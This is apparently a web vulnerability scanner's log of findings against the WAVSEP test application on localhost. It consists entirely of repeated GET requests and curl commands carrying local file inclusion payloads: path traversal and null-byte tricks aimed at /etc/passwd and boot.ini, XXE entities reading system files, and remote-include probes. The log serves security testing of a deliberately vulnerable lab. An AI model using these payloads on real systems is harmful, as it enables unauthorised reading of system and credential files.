GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

